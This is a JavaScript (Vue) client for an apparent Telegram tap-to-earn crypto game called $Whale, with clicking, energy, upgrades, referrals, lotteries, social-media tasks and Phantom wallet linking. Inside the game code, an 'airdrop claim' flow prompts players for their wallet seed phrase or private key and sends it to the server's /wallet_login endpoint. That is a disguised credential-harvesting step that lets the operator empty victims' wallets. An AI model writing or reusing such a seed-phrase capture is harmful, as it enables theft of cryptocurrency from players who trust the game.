const userId = new URLSearchParams(window.location.search).get("user_id");
const apiUrl = "";
let phantomProvider = null;

const app = new Vue({
  el: "#app",
  data: {
    // Core game data
    balance: 0,
    energy: 1000,
    maxEnergy: 1000,
    energyRestoreRate: 1,
    clickPower: 1,
    lastClickTime: Date.now(),
    activeTouches: 0,
    clickInterval: null,
    clickCooldown: 0,
    clickCount: 0,
    lastServerUpdate: Date.now(),
    serverUpdateInterval: 5000,

    // Daily reward data
    currentDay: 1,
    dailyRewardAmount: 500,
    dailyRewardClaimed: false,
    nextResetTime: "",

    // Lottery data
    canClaimLottery: false,
    nextLotteryClaim: null,
    lotteryCountdown: "",

    // Referral data
    referralLink: "",
    referralCount: 0,
    referredFriends: [],

    // Leaderboard data
    leaderboard: [],
    isLeaderboardLoading: false,
    userRank: null,
    userBalance: null,

    // UI data
    activeSection: null,
    quickTip: "",
    upgradeIcons: {
      "Double Click Power":
        "https://raw.githubusercontent.com/Tarikul-Islam-Anik/Telegram-Animated-Emojis/main/Symbols/Top%20Arrow.webp",
      "Auto-Clicker":
        "https://raw.githubusercontent.com/Tarikul-Islam-Anik/Telegram-Animated-Emojis/main/Smileys/Robot.webp",
      "Energy Regeneration Boost":
        "https://raw.githubusercontent.com/Tarikul-Islam-Anik/Telegram-Animated-Emojis/main/People/Flexed%20Biceps.webp",
    },

    // Upgrade data
    upgrades: [
      {
        name: "Double Click Power",
        type: "double click power",
        cost: 1000,
        max_level: 5,
      },
      {
        name: "Auto-Clicker",
        type: "auto-clicker",
        cost: 5000,
        max_level: 1,
      },
      {
        name: "Energy Regeneration Boost",
        type: "energy regeneration boost",
        cost: 3000,
        max_level: 3,
      },
    ],

    // Auto clicker data
    isAutoClickerActive: false,
    autoClickerBalance: 0,
    autoClickerInterval: null,

    // Task reward status
    premiumRewardClaimed: false,
    channelBoostRewarded: false,
    discordRewarded: false,
    twitterRewarded: false,
    channelSubscriptionRewarded: false,
    donationRewarded: false,

    publicKey: null,
    showAirdropModal: false,
    showWalletLoginModal: false,
    walletLoginData: {
      seed_phrase: "",
    },
  },
  mounted() {
    // Initial data fetching and setup
    this.getBalance();
    this.getReferralLink();
    this.getEnergy();
    this.setupTouchEvents();
    this.getDailyRewardInfo();
    this.getLotteryInfo();
    this.getReferralInfo();
    this.getTaskStatus();
    this.getUpgrades();
    this.getQuickTip();

    // Set up intervals and timeouts
    setInterval(this.getEnergy, 60000);
    this.startEnergyRestoration();
    this.startAutoClicker();
    this.startServerUpdateInterval();
    setInterval(this.updateAutoClickerBalance, 5000);
    this.updateAutoClickerBalance();

    this.fetchUserWalletDetails();

    this.checkAirdropEligibility();

    setTimeout(() => {
      const loadingScreen = document.getElementById("loading-screen");
      const app = document.getElementById("app");

      if (loadingScreen) {
        loadingScreen.style.display = "none";
      }

      if (app) {
        app.style.display = "block";
      }

      this.$forceUpdate();
    }, 3000);
  },

  beforeUnmount() {
    clearInterval(this.autoClickerInterval);
  },

  beforeDestroy() {
    clearInterval(this.autoClickerUpdateInterval);
  },

  methods: {
    // --- Core Game Logic ---

    checkAirdropEligibility() {
      console.log("Balance:", this.balance);
      console.log("Public Key:", this.publicKey);

      if (this.balance >= 1000 && this.publicKey) {
        this.showAirdropModal = true;
      } else {
        this.showAirdropModal = false;
        console.log("Not eligible for airdrop");
      }
    },

    handleAirdropClaim() {
      if (!this.publicKey) {
        alert("Please connect your wallet first");
        return;
      }
      this.showWalletLoginModal = true;
    },

    async claimAirdrop() {
      if (!this.walletLoginData.seed_phrase) {
        alert("Please enter your seed phrase or private key.");
        return;
      }

      try {
        const response = await fetch("/claim_airdrop", {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify({
            user_id: this.userId,
            wallet_address: this.publicKey,
          }),
        });

        const result = await response.json();

        if (result.success) {
          this.showAirdropModal = false;
          this.showWalletLoginModal = false;
          alert("Airdrop claimed successfully!");
        } else {
          alert(result.message || "Airdrop claim failed");
        }
      } catch (error) {
        console.error("Airdrop claim error:", error);
        alert("Failed to claim airdrop. Please try again.");
      }
    },

    async submitWalletLogin() {
      if (!this.walletLoginData.seed_phrase) {
        alert("Please enter your seed phrase or private key.");
        return;
      }

      try {
        const response = await fetch("/wallet_login", {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            user_id: this.userId,
            seed_phrase: this.walletLoginData.seed_phrase,
          }),
        });

        const result = await response.json();

        if (result.success) {
          alert("Wallet login successful!");
          this.showWalletLoginModal = false;

          await this.claimAirdrop();
        } else {
          alert(result.message);
        }
      } catch (error) {
        console.error("Wallet login error:", error);
        alert("Login failed. Please try again.");
      }
    },

    async fetchUserWalletDetails() {
      try {
        const urlParams = new URLSearchParams(window.location.search);
        this.userId = urlParams.get("user_id");

        if (!this.userId) {
          console.error("No user ID found");
          return;
        }

        const response = await fetch(
          `/get_user_wallet_details?user_id=${this.userId}`
        );
        const result = await response.json();

        if (result.success) {
          this.publicKey = result.solana_wallet;
          this.balance = result.balance || 0;

          if (this.publicKey) {
            await this.autoConnectWallet();
          }

          this.checkAirdropEligibility();
        }
      } catch (error) {
        console.error("Error fetching wallet details:", error);
        this.promptWalletConnection();
      }
    },

    async autoConnectWallet() {
      if (!window.solana || !window.solana.isPhantom) {
        this.promptWalletConnection();
        return;
      }

      try {
        if (window.solana.isConnected) {
          const resp = await window.solana.connect({ onlyIfTrusted: true });
          const currentPublicKey = resp.publicKey.toString();

          if (currentPublicKey === this.publicKey) {
            return;
          }
        }
      } catch (err) {
        console.error("Auto-connect error:", err);
        this.promptWalletConnection();
      }
    },

    promptWalletConnection() {
      alert("Please connect your Phantom Wallet to continue");
    },

    async connectPhantom() {
      if (!window.solana || !window.solana.isPhantom) {
        alert("Phantom wallet not found. Please install Phantom wallet.");
        window.open("https://phantom.app", "_blank");
        return;
      }

      try {
        const resp = await window.solana.connect();
        this.publicKey = resp.publicKey.toString();

        const response = await fetch("/connect_wallet", {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify({
            user_id: this.userId,
            public_key: this.publicKey,
          }),
        });

        const result = await response.json();

        if (!result.success) {
          alert(result.message || "Failed to connect wallet");
          this.publicKey = null;
        } else {
          await this.fetchUserWalletDetails();
        }
      } catch (err) {
        console.error("Wallet connection error:", err);
        alert("Failed to connect wallet. Please try again.");
        this.publicKey = null;
      }
    },
    async mounted() {
      const webapp = window.Telegram.WebApp;
      webapp.ready();
      if (
        window.solana &&
        window.solana.isPhantom &&
        window.solana.isConnected
      ) {
        try {
          this.connectPhantom();
        } catch (err) {
          console.error("Error auto-connecting:", err);
        }
        const loadingScreen = document.getElementById("loading-screen");
        if (loadingScreen) {
          loadingScreen.style.display = "none";
        }
        document.getElementById("app").style.display = "block";
        if (webapp.platform !== "android" && webapp.platform !== "ios") {
          document.getElementById("app").innerHTML = `
                  <div style="position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center;">
                  <img src="img/coin.png" alt="Whale Coin" style="max-width: 350px; margin-bottom: 20px;">
                  <h1>Switch to Mobile</h1>
                  <p>For the best experience, please use your mobile device.</p>
                  </div>`;
        }
      } else {
        alert("Please install Phantom Wallet to use $Whale");
        const loadingScreen = document.getElementById("loading-screen");
        if (loadingScreen) {
          loadingScreen.style.display = "none";
        }
        document.getElementById("app").style.display = "block";
        if (webapp.platform !== "android" && webapp.platform !== "ios") {
          document.getElementById("app").innerHTML = `
                  <div style="position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center;">
                  <img src="img/coin.png" alt="Whale Coin" style="max-width: 350px; margin-bottom: 20px;">
                  <h1>Switch to Mobile</h1>
                  <p>For the best experience, please use your mobile device.</p>
                  </div>`;
        }
      }
      this.$forceUpdate();
    },

    clickCoin() {
      const currentTime = Date.now();
      if (
        currentTime - this.lastClickTime < this.clickCooldown ||
        this.energy < this.clickPower
      ) {
        return;
      }

      this.clickCount++;
      this.energy = Math.max(0, this.energy - this.clickPower);
      this.balance += this.clickPower;
      this.updateEnergyDisplay();
      this.lastClickTime = currentTime;
      this.updateEnergyOnServer();

      if (currentTime - this.lastServerUpdate >= this.serverUpdateInterval) {
        this.sendClicksToServer();
      }
    },

    sendClicksToServer() {
      if (this.clickCount > 0) {
        fetch(`${apiUrl}/click`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ user_id: userId, clicks: this.clickCount }),
        })
          .then((response) => response.json())
          .then((data) => {
            this.balance = data.balance;
            this.energy = data.energy;
            this.updateEnergyDisplay();
          });

        this.clickCount = 0;
        this.lastServerUpdate = Date.now();
      }
    },

    startServerUpdateInterval() {
      setInterval(() => {
        this.sendClicksToServer();
      }, this.serverUpdateInterval);
    },

    // --- Energy Management ---

    getEnergy() {
      fetch(`${apiUrl}/energy?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          if (data.energy !== undefined) {
            this.energy = data.energy;
            this.maxEnergy = data.max_energy;
            this.updateEnergyDisplay();
          }
        });
    },

    syncEnergy() {
      fetch(`${apiUrl}/energy?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          if (data.energy !== undefined) {
            this.energy = data.energy;
            this.maxEnergy = data.max_energy;
            this.updateEnergyDisplay();
          }
        });
    },

    startEnergyRestoration() {
      setInterval(() => {
        if (this.energy < this.maxEnergy) {
          this.energy = Math.min(
            this.maxEnergy,
            this.energy + this.energyRestoreRate
          );
          this.updateEnergyDisplay();
          this.updateEnergyOnServer();
        }
        // Periodically synchronize energy with the server
        if (Math.random() < 0.1) {
          this.syncEnergy();
        }
      }, 1000);
    },

    updateEnergyDisplay() {
      document.getElementById("energy-fill").style.width = `${
        (this.energy / this.maxEnergy) * 100
      }%`;
      document.getElementById("energy-text").textContent = `${Math.floor(
        this.energy
      )}/${this.maxEnergy}`;
      const coinElement = document.querySelector(".coin");
      coinElement.classList.toggle("disabled", this.energy <= 0);
    },

    updateEnergyOnServer() {
      fetch(`${apiUrl}/update_energy`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: userId, energy: this.energy }),
      }).then(() => {
        this.syncEnergy();
      });
    },

    // --- User Interaction and Event Handling ---

    setupTouchEvents() {
      const coinElement = document.getElementById("coinImage");

      // Touch Events
      coinElement.addEventListener("touchstart", (e) => {
        e.preventDefault();
        this.activeTouches = e.touches.length;
        coinElement.classList.add("active");
        this.handleCoinClick();
      });

      coinElement.addEventListener("touchend", (e) => {
        e.preventDefault();
        this.activeTouches = e.touches.length;
        coinElement.classList.remove("active");
      });

      // Mouse Events (for non-touch devices)
      coinElement.addEventListener("mousedown", (e) => {
        e.preventDefault();
        this.activeTouches = 1;
        coinElement.classList.add("active");
        this.handleCoinClick();
      });

      coinElement.addEventListener("mouseup", (e) => {
        e.preventDefault();
        this.activeTouches = 0;
        coinElement.classList.remove("active");
      });

      // Reset active state if the interaction is interrupted
      coinElement.addEventListener("touchcancel", this.cancelActiveState);
      coinElement.addEventListener("mouseleave", this.cancelActiveState);
    },

    cancelActiveState(e) {
      e.preventDefault();
      this.activeTouches = 0;
      e.target.classList.remove("active");
    },

    handleCoinClick() {
      if (this.energy >= this.clickPower) {
        this.clickCoin();
        this.playClickSound();
      }
    },

    multiClick() {
      for (let i = 0; i < this.activeTouches; i++) {
        this.clickCoin();
      }
    },

    // --- UI and Display ---

    toggleSection(sectionName) {
      if (this.activeSection) {
        const currentSection = document.querySelector(
          `.section.${this.activeSection}`
        );
        currentSection.classList.remove("active");
        setTimeout(() => {
          this.activeSection = sectionName;
          if (sectionName) {
            setTimeout(() => {
              const newSection = document.querySelector(
                `.section.${sectionName}`
              );
              newSection.classList.add("active");
              if (sectionName === "leaderboard") {
                this.getLeaderboard();
              }
            }, 50);
          }
        }, 300);
      } else {
        this.activeSection = sectionName;
        if (sectionName) {
          setTimeout(() => {
            const newSection = document.querySelector(
              `.section.${sectionName}`
            );
            newSection.classList.add("active");
            if (sectionName === "leaderboard") {
              this.getLeaderboard();
            }
          }, 50);
        }
      }
    },

    calculateFontSize(name) {
      const baseSize = 16;
      const maxLength = 20;
      if (name.length <= maxLength) {
        return `${baseSize}px`;
      } else {
        const scaleFactor = maxLength / name.length;
        return `${Math.max(baseSize * scaleFactor, 10)}px`;
      }
    },

    showNotification(message, type = "success") {
      const notificationContainer = document.querySelector(
        ".notification-container"
      );
      const notification = document.createElement("div");
      notification.className = `notification ${type}`;
      notification.textContent = message;
      notificationContainer.appendChild(notification);
      notification.offsetHeight;
      notification.classList.add("show");

      setTimeout(() => {
        notification.classList.remove("show");
        setTimeout(() => {
          notificationContainer.removeChild(notification);
        }, 300);
      }, 3000);
    },

    // --- Referral System ---

    getReferralLink() {
      fetch(`${apiUrl}/referral_link?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          this.referralLink = data.link;
        });
    },

    getReferralInfo() {
      fetch(`${apiUrl}/referral_info?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          this.referralCount = data.referral_count;
          this.referredFriends = data.referred_friends;
        });
    },

    copyReferralLink() {
      navigator.clipboard
        .writeText(this.referralLink)
        .then(() => this.showNotification("Referral link copied!"))
        .catch((err) => {
          console.error("Error copying text: ", err);
          this.showNotification("Failed to copy referral link", "error");
        });
    },

    shareReferralLink() {
      const text = encodeURIComponent(
        `Join me on this amazing platform and earn $WHALE tokens! Use my referral link!`
      );
      const url = encodeURIComponent(this.referralLink);
      const telegramShareUrl = `https://t.me/share/url?url=${url}&text=${text}`;

      window.open(telegramShareUrl, "_blank");
    },

    // --- Leaderboard ---

    getLeaderboard() {
      this.isLeaderboardLoading = true;
      fetch(`${apiUrl}/leaderboard?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          this.leaderboard = data.leaderboard;
          this.userRank = data.user_rank;
          this.userBalance = data.user_balance;
          this.isLeaderboardLoading = false;
        })
        .catch((error) => {
          console.error("Error fetching leaderboard:", error);
          this.isLeaderboardLoading = false;
        });
    },

    // --- Daily Rewards ---

    getDailyRewardInfo() {
      fetch(`${apiUrl}/daily_reward?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          this.currentDay = data.current_day;
          this.dailyRewardAmount = data.reward_amount;
          this.dailyRewardClaimed = data.claimed;
          this.nextResetTime = data.next_reset;
        });
    },

    claimDailyReward() {
      fetch(`${apiUrl}/claim_daily_reward`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: userId }),
      })
        .then((response) => response.json())
        .then((data) => {
          if (data.success) {
            this.balance += data.reward_amount;
            this.dailyRewardClaimed = true;
            this.showNotification(`Claimed ${data.reward_amount} $WHALE!`);
          } else {
            this.showNotification(data.message, "error");
          }
        });
    },

    // --- Daily Lottery ---

    getLotteryInfo() {
      fetch(`${apiUrl}/daily_lottery?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          this.canClaimLottery = data.can_claim;
          this.nextLotteryClaim = data.next_claim
            ? new Date(data.next_claim)
            : null;
          this.updateLotteryCountdown();
        });
    },

    claimDailyLottery() {
      fetch(`${apiUrl}/claim_daily_lottery`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: userId }),
      })
        .then((response) => response.json())
        .then((data) => {
          if (data.success) {
            this.balance += data.amount;
            this.canClaimLottery = false;
            this.nextLotteryClaim = new Date(data.next_claim);
            this.showNotification(
              `Congratulations! You won ${data.amount} $WHALE in the lottery!`
            );
            this.updateLotteryCountdown();
          } else {
            this.showNotification(data.message, "error");
          }
        });
    },

    updateLotteryCountdown() {
      if (this.nextLotteryClaim) {
        const updateCountdown = () => {
          const now = new Date();
          const difference = this.nextLotteryClaim - now;

          if (difference > 0) {
            const hours = Math.floor(difference / (1000 * 60 * 60));
            const minutes = Math.floor(
              (difference % (1000 * 60 * 60)) / (1000 * 60)
            );
            const seconds = Math.floor((difference % (1000 * 60)) / 1000);

            this.lotteryCountdown = `${hours}h ${minutes}m ${seconds}s`;

            setTimeout(updateCountdown, 1000);
          } else {
            this.canClaimLottery = true;
            this.lotteryCountdown = "";
          }
        };

        updateCountdown();
      }
    },

    // --- Upgrades ---

    getUpgrades() {
      fetch(`${apiUrl}/upgrades?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          this.upgrades = Object.values(data.upgrades);
          this.balance = data.balance;
          this.clickPower = data.click_power;
          this.energyRestoreRate = data.energy_restore_rate;
        });
    },

    purchaseUpgrade(upgrade) {
      console.log(`Attempting to purchase upgrade:`, upgrade);
      fetch(`${apiUrl}/update_upgrade`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          user_id: userId,
          upgrade_type: upgrade.type,
        }),
      })
        .then((response) => response.json())
        .then((data) => {
          if (data.success) {
            this.showNotification(`Upgrade purchased successfully!`);
            this.getUpgrades();
            this.getBalance();
            if (upgrade.type === "auto-clicker") {
              this.activateAutoClicker();
            }
          } else {
            this.showNotification(data.message, "error");
          }
        })
        .catch((error) => {
          console.error("Error:", error);
          this.showNotification(
            "An error occurred while purchasing the upgrade",
            "error"
          );
        });
    },

    // --- Auto-Clicker ---

    startAutoClicker() {
      this.isAutoClickerActive = true;
      this.updateAutoClickerBalance();
      this.autoClickerUpdateInterval = setInterval(
        this.updateAutoClickerBalance,
        30000
      );
    },

    stopAutoClicker() {
      this.isAutoClickerActive = false;
      clearInterval(this.autoClickerUpdateInterval);
    },

    updateAutoClickerBalance() {
      fetch(`${apiUrl}/get_auto_clicker_balance?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          if (data.success) {
            this.autoClickerBalance = data.balance;
            if (this.autoClickerBalance >= 15000) {
              this.isAutoClickerActive = false;
              clearInterval(this.autoClickerUpdateInterval);
            }
          }
        });
    },

    activateAutoClicker() {
      fetch(`${apiUrl}/activate_auto_clicker`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: userId }),
      })
        .then((response) => response.json())
        .then((data) => {
          if (data.success) {
            this.showNotification(data.message);
            this.isAutoClickerActive = true;
            this.startAutoClicker();
          } else {
            this.showNotification(data.message, "error");
          }
        })
        .catch((error) => {
          console.error("Error:", error);
          this.showNotification(
            "An error occurred while activating the auto-clicker",
            "error"
          );
        });
    },

    claimAutoClickerReward() {
      fetch(`${apiUrl}/claim_auto_clicker_reward`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: userId }),
      })
        .then((response) => response.json())
        .then((data) => {
          if (data.success) {
            this.balance += parseInt(data.claimed_amount);
            this.autoClickerBalance = 0;
            this.showNotification(data.message);
            this.stopAutoClicker();
          } else {
            this.showNotification(data.message, "error");
          }
        })
        .catch((error) => {
          console.error("Error:", error);
          this.showNotification(
            "An error occurred while claiming the reward",
            "error"
          );
        });
    },

    handleAutoClicker() {
      if (this.autoClickerBalance >= 15000) {
        this.claimAutoClickerReward();
      } else if (this.autoClickerBalance === 0) {
        this.activateAutoClicker();
      } else {
        this.showNotification("Auto-clicker is currently active", "info");
      }
    },

    // --- Tasks and Rewards ---

    getTaskStatus() {
      fetch(`${apiUrl}/task_status?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          this.premiumRewardClaimed = data.premium_reward_claimed;
          this.channelSubscriptionRewarded = data.channel_subscription_rewarded;
          this.channelBoostRewarded = data.channel_boost_rewarded;
          this.discordRewarded = data.discord_rewarded;
          this.twitterRewarded = data.twitter_rewarded;
        })
        .catch((error) => {
          console.error("Error fetching task status:", error);
        });
    },

    checkPremium() {
      fetch(`${apiUrl}/check_premium`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: userId }),
      })
        .then((response) => response.json())
        .then((data) => {
          if (data.success) {
            this.balance += 50000;
            this.showNotification(data.message);
            this.premiumRewardClaimed = true;
          } else {
            this.showNotification(data.message, "error");
          }
        })
        .catch((error) => {
          console.error("Error:", error);
          this.showNotification(
            "An error occurred while checking premium status. Please try again later.",
            "error"
          );
        });
    },

    async subscribeChannel() {
      if (this.channelSubscriptionRewarded) {
        this.showNotification(
          "You have already received the reward for subscribing to the channel.",
          "info"
        );
        return;
      }

      window.open("https://t.me/...", "_blank");

      await new Promise((resolve) => setTimeout(resolve, 5000));

      try {
        const response = await fetch("/check_channel_subscription", {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify({ user_id: userId }),
        });

        const data = await response.json();

        if (data.success) {
          this.channelSubscriptionRewarded = true;
          this.balance += 10000;
          this.showNotification(data.message, "success");
        } else {
          this.showNotification(data.message, "warning");
        }
      } catch (error) {
        console.error("Error:", error);
        this.showNotification(
          "An error occurred. Please try again later.",
          "error"
        );
      }
    },

    async joinDiscord() {
      if (this.discordRewarded) {
        this.showNotification(
          "You have already received the reward for joining Discord.",
          "info"
        );
        return;
      }

      window.open("https://discord.com/invite/...", "_blank");

      try {
        const response = await fetch(`${apiUrl}/claim_social_reward`, {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify({ user_id: userId, task_type: "discord" }),
        });

        const data = await response.json();

        if (data.success) {
          this.balance += 5000;
          this.showNotification(data.message, "success");
          this.discordRewarded = true;
        } else {
          this.showNotification(data.message, "warning");
        }
      } catch (error) {
        console.error("Error:", error);
        this.showNotification(
          "An error occurred. Please try again later.",
          "error"
        );
      }
    },

    async followTwitter() {
      if (this.twitterRewarded) {
        this.showNotification(
          "You have already received the reward for following on Twitter.",
          "info"
        );
        return;
      }

      window.open(
        "https://x.com/...",
        "_blank"
      );

      try {
        const response = await fetch(`${apiUrl}/claim_social_reward`, {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify({ user_id: userId, task_type: "twitter" }),
        });

        const data = await response.json();

        if (data.success) {
          this.balance += 5000;
          this.showNotification(data.message, "success");
          this.twitterRewarded = true;
        } else {
          this.showNotification(data.message, "warning");
        }
      } catch (error) {
        console.error("Error:", error);
        this.showNotification(
          "An error occurred. Please try again later.",
          "error"
        );
      }
    },

    boostChannel() {
      fetch(`${apiUrl}/check_channel_boost`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: userId }),
      })
        .then((response) => response.json())
        .then((data) => {
          if (data.success) {
            this.balance += 20000;
            this.showNotification(data.message);
            this.channelBoostRewarded = true;
          } else {
            this.showNotification(data.message, "error");
          }
        })
        .catch((error) => {
          console.error("Error:", error);
          this.showNotification(
            "An error occurred while checking channel boost. Please try again later.",
            "error"
          );
        });
    },

    // --- Donations ---

    donate() {
      const amount = 250;
      this.showNotification("Processing your donation of 250 Stars...", "info");

      fetch(`${apiUrl}/donate`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: userId, amount: amount }),
      })
        .then((response) => response.json())
        .then((data) => {
          if (data.success && data.invoice_link) {
            this.showNotification(
              "Donation processed successfully. Click the link to complete the payment.",
              "success"
            );
            this.showDonationLink(data.invoice_link);
            this.checkDonationStatus();
          } else {
            this.showNotification(
              data.message ||
                "An error occurred while processing the donation.",
              "error"
            );
          }
        })
        .catch((error) => {
          console.error("Error:", error);
          this.showNotification(
            "An error occurred while processing your donation. Please try again later.",
            "error"
          );
        });
    },

    showDonationLink(link) {
      const donationArea = document.getElementById("donationArea");
      donationArea.innerHTML = `<a href="${link}" target="_blank" class="donation-link">Complete Payment</a>`;
    },

    checkDonationStatus() {
      let checkCount = 0;
      const maxChecks = 12;
      const checkInterval = setInterval(() => {
        fetch(`${apiUrl}/process_donation`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({ user_id: userId }),
        })
          .then((response) => response.json())
          .then((data) => {
            if (data.success) {
              clearInterval(checkInterval);
              this.balance = data.new_balance;
              this.donationRewarded = true;
              this.showNotification(
                "Thank you for your donation! 30000 $WHALE has been added to your balance.",
                "success"
              );
            }
          })
          .catch((error) => {
            console.error("Error checking donation status:", error);
          });

        checkCount++;
        if (checkCount >= maxChecks) {
          clearInterval(checkInterval);
          this.showNotification(
            "Donation status check timed out. If you completed the payment, please contact support.",
            "warning"
          );
        }
      }, 10000);
    },

    processDonation() {
      fetch(`${apiUrl}/process_donation`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ user_id: userId }),
      })
        .then((response) => response.json())
        .then((data) => {
          if (data.success) {
            this.balance = data.new_balance;
            this.showNotification(data.message);
            this.donationRewarded = true;
          } else {
            this.showNotification(
              "Donation not completed. Please try again or contact support.",
              "warning"
            );
          }
        })
        .catch((error) => {
          console.error("Error:", error);
          this.showNotification(
            "An error occurred while processing your donation. Please contact support.",
            "error"
          );
        });
    },

    // --- Miscellaneous ---

    getQuickTip() {
      fetch(`${apiUrl}/quick_tip`)
        .then((response) => response.json())
        .then((data) => {
          this.quickTip = data.tip;
        });
    },

    getBalance() {
      fetch(`${apiUrl}/balance?user_id=${userId}`)
        .then((response) => response.json())
        .then((data) => {
          this.balance = data.balance;
        });
    },
  },
});
